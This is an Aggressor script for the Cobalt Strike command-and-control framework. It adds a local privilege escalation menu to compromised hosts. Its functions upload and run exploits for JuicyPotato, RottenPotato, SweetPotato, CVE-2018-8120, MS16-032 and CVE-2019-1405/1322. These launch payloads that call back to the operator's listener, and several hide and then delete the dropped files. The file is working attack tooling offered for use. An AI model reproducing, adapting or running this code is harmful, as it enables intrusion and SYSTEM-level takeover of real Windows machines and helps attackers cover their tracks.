#define functions


sub RunJuicyPotato{
    btask($bid, "Task Beacon to run " . listener_describe($3['listener']) . " via JuicyPotato");
    local('$payload $handle $call $port $id $fname $total');
    @array = @("a", "b", "c", "d", "e", "f", "g", "1", "2", "3", "4", "5", "6");
    $total = 8;
    $call = $3['Call'];
    $port = $3['Port'];
    $id = $3['CLSID'];
    while($total >= 0){
        $fname = $fname.rand(@array);
        $total = $total - 1;
    }
    $fname = $fname.".cmd";
    if ($call eq "CreateProcessWithTokenW"){
        $call = "t";
    }
    else if($call eq "CreateProcessAsUser"){
        $call = "u";
    }
    else{
        $call = "\*";
    }
    if( !-isnumber $port){
        show_error("The port is not regular. Please enter the number in the range of 1-65535 !");
        return;
    }
    if(($port < 1) || ($port > 65535)){
        show_error("Port out of range !");
        return;
    }
    $payload = powershell($3['listener'], false);
    $handle = openf("> $+ $fname");
    writeb($handle, $payload);
    closef($handle);
    bupload!($bid, script_resource("exp/jp/jp.exe"));
    bupload!($bid, $fname);
    bshell!($bid,"jp.exe -t  $+ $call -l  $+ $port -p  $+ $fname");
    exec("cmd.exe /C del /F ".$fname);
}

sub CVE_2018_8120{
    btask($bid, "Task Beacon to run " . listener_describe($3['listener']) . " via CVE-2018-8120");
    local('$Rch $payload');
    $Rch = "x86";
    if (beacon_info($bid,"is64") == 1){
        $Rch = "x64";
    }
    $payload = powershell($3['listener'], false, $Rch);
    bupload!($bid, script_resource("exp/8120/ $+ $Rch $+ .exe"));
    bshell!($bid, "attrib \"$Rch $+ .exe\" +s +h");
    bshell!($bid,"$Rch $+ .exe \"".$payload."\"");
    bshell!($bid,"taskkill /f /im $Rch $+ .exe");
    bshell!($bid,"del /F /S /Q /AH $Rch $+ .exe");
}

sub ms16032{
    btask($bid, "Task Beacon to run " . listener_describe($3['listener']) . " via ms16-032");
    local('$Rch $payload $fname');
    @array = @("a", "b", "c", "d", "e", "f", "g", "1", "2", "3", "4", "5", "6");
    $total = 8;
    while($total >= 0){
        $fname = $fname.rand(@array);
        $total = $total - 1;
    }
    $fname = $fname.".cmd";
    $Rch = "x86";
    if (beacon_info($bid,"is64") == 1){
        $Rch = "x64";
    }
    $payload = powershell($3['listener'], false, $Rch);
    $handle = openf("> $+ $fname");
    writeb($handle, $payload);
    closef($handle);
    bupload!($bid, $fname);
    bshell!($bid, "attrib \" $+ $fname\" +s +h");
    bpowershell_import!($bid, script_resource("script/MS16-032.ps1"));
	bpowershell!($bid, "Invoke-MS16-032  $+ $fname");
    exec("cmd.exe /C del /F ".$fname);
}

sub RottenPotato{
    btask($bid, "Task Beacon to run " . listener_describe($3['listener']) . " via RottenPotato (ms16-075)");
    if (-is64 $1)
    {
        $arch = "x64";
        $dll = "x64.dll";
    } else {
        $arch = "x86";
        $dll = "x86.dll";
    }
    $stager = shellcode($3['listener'], false, $arch);
    bdllspawn($bid, script_resource("exp/16075/".$dll), $stager, "NTLM DCOM->RPC NTLM Reflection (MS16-075)", 5000);
    beacon_link($bid, $null, $3['listener']);
}


sub CVE_2019_1405_1322{
    btask($bid, "Task Beacon to run " . listener_describe($3['listener']) . " via CVE-2019-1405(1322)");
    local('$Rch $payload');
    $Rch = "x64";
    if (beacon_info($bid,"is64") != 1){
        show_error("The target is not a x64 machine !");
        return;
    }
    $payload = powershell($3['listener'], false, $Rch);
    bupload!($bid, script_resource("exp/com/1405_1322_x64.exe"));
    bshell!($bid, "attrib \"1405_1322_x64.exe\" +s +h");
    bshell!($bid,"1405_1322_x64.exe \"".$payload."\"");
    bshell!($bid,"del /F /S /Q /AH 1405_1322_x64.exe");
}

sub SweetPotato {
	local('$shellcode $arch $program $exe $parm');
    btask($bid, "Task Beacon to run " . listener_describe($3['listener']) . " via SweetPotato (ms16-075)", "T1068");
    if (-is64 $bid)
    {
        $arch = "x64";
	} else {
        $arch = "x86";
	}
	$program = "c:\\windows\\system32\\werfault.exe";
	$exe = script_resource("exp/sp/sp.exe");
	$shellcode = base64_encode(artifact_payload($3['listener'], "raw", $arch));
	$parm = "-l 6363 "."-p $program "."-s $shellcode";
    bexecute_assembly!($bid, $exe, $parm);
	beacon_link($bid, $null, $3['listener']);
}

#append menus



    menu "Local Privilege Escalation"{

        menu "Potatos(MS16-075)"{

            item "Rotten-Potato"{
                $bid = $1['@'];
                $Dialog = dialog("Rotten Potato",%(bid => $bid),&RottenPotato);
                dialog_description($Dialog, "The vulnerability could allow elevation of privilege.");
                drow_listener($Dialog, "listener", "Listener: ");
                dbutton_action($Dialog, "Exploit");
                dialog_show($Dialog);
            }

            item "Juicy-Potato"{
                $bid = $1['@'];
                $Dialog = dialog("Juicy Potato",%(Call =>"Both", Port => "1337", CLSID => "{4991d34b-80a1-4291-83b6-3328366b9097}", bid => $bid),&RunJuicyPotato);
                dialog_description($Dialog, "A sugared version of RottenPotatoNG, with a bit of juice, i.e. another Local Privilege Escalation tool, from a Windows Service Accounts to NT AUTHORITY\\SYSTEM. ");
                drow_listener($Dialog, "listener", "Listener: ");
                drow_combobox($Dialog, "Call",  "Createprocess Call: ", @("CreateProcessWithTokenW","CreateProcessAsUser","Both"));
                drow_text($Dialog, "Port", "Listen Port: ");
                drow_text($Dialog, "CLSID", "CLSID: ");
                dbutton_action($Dialog, "Exploit");
                dialog_show($Dialog);
            }

            item "Sweet-Potato"{
                $bid = $1['@'];
                $Dialog = dialog("Sweet Potato",%(bid => $bid),&SweetPotato);
                dialog_description($Dialog, "The vulnerability could allow elevation of privilege.");
                drow_listener($Dialog, "listener", "Listener: ");
                dbutton_action($Dialog, "Exploit");
                dialog_show($Dialog);
            }


        }

        item "CVE-2018-8120"{
            $bid = $1['@'];
            $Dialog = dialog("CVE-2018-8120",%(bid => $bid),&CVE_2018_8120);
            dialog_description($Dialog, "when the Win32k component fails to properly handle objects in memory\, aka \"Win32k Elevation of Privilege Vulnerability.\"");
            drow_listener($Dialog, "listener", "Listener: ");
            dbutton_action($Dialog, "Exploit");
            dialog_show($Dialog);
        }

        item "MS16-032"{
            $bid = $1['@'];
            $Dialog = dialog("MS16-032",%(bid => $bid),&ms16032);
            dialog_description($Dialog, "The vulnerability could allow elevation of privilege if the Windows Secondary Logon Service fails to properly manage request handles in memory.");
            drow_listener($Dialog, "listener", "Listener: ");
            dbutton_action($Dialog, "Exploit");
            dialog_show($Dialog);
        }

        item "CVE-2019-1405 && 1322"{
            $bid = $1['@'];
            $Dialog = dialog("CVE-2019-1405/1322",%(bid => $bid),&CVE_2019_1405_1322);
            dialog_description($Dialog, "An elevation of privilege vulnerability exists when Windows improperly handles authentication requests");
            drow_listener($Dialog, "listener", "Listener: ");
            dbutton_action($Dialog, "Exploit");
            dialog_show($Dialog);
        }
    }